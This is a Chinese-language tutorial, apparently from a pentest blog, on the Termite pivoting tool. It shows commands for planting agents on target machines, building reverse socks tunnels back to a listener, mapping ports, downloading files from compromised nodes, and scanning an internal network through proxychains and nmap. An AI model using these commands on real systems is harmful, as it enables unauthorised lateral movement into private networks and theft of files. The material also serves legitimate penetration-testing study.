1 | -l 指定本地socks端口,等待远程连 |
适用端口转发的网络环境有以下几种:
1 | 1. 服务器处于内网,可以访问外部网络。 |
测试环境:
1 | win10(10.22.XX.XX),ubuntu(192.168.XX.XX),ubuntu1(192.168.XX.XXX) |
在termite目录下使用此命令,在ubuntu机器上执行如下语句,语句成功执行后会返回一个id号,主要用来标识当前是哪一个agent,后期我们可以很方便的通过这个id号,灵活切换agent,本地的这个端口其实就是socks代理端口,也就是说,实战中我们可以把目标内网中的所有机器都弹到这一台指定的机器上1
./agent_Linux64 -l 8989
在目标win机器上执行,下面的意思,说的通俗点其实就是建立反向socks1
2
3A对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理
B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理
反向代理的好处:当AB之间有防火墙,不允许A连B,但是允许B连A1
agent_Win32.exe -c 192.168.XX.XX -p 8989
在ubuntu上admin端连接ubuntu01机器上刚刚监听的端口,连接成功后会自动进入termite的内置终端,在终端中执行’help’即可看到所有选项用途,’show’一下就可清晰地看到当前agent的分布1
./admin_Linux64 -c 192.168.XX.XX -p 8989
去不同的节点,可以下载文件什么的1
2>>>goto 2
>>>downfile G:\python2.7\photo.py photo.py
利用Termite把b与a的端口映射1
>>>>lcxtran 8989(ubuntu 端口) 172.16.18.1(ubuntu01 ip) 6565(ubuntu 端口)
利用proxychains进行转发
安装proxychains1
$sudo apt-get install proxychains
- 修改proxychains文件
1
$ vim /etc/proxychains.conf
1 | #defaults set to "tor" |
- proxychains与nmap联合使用
1
proxychains nmap 10.22.XX.XX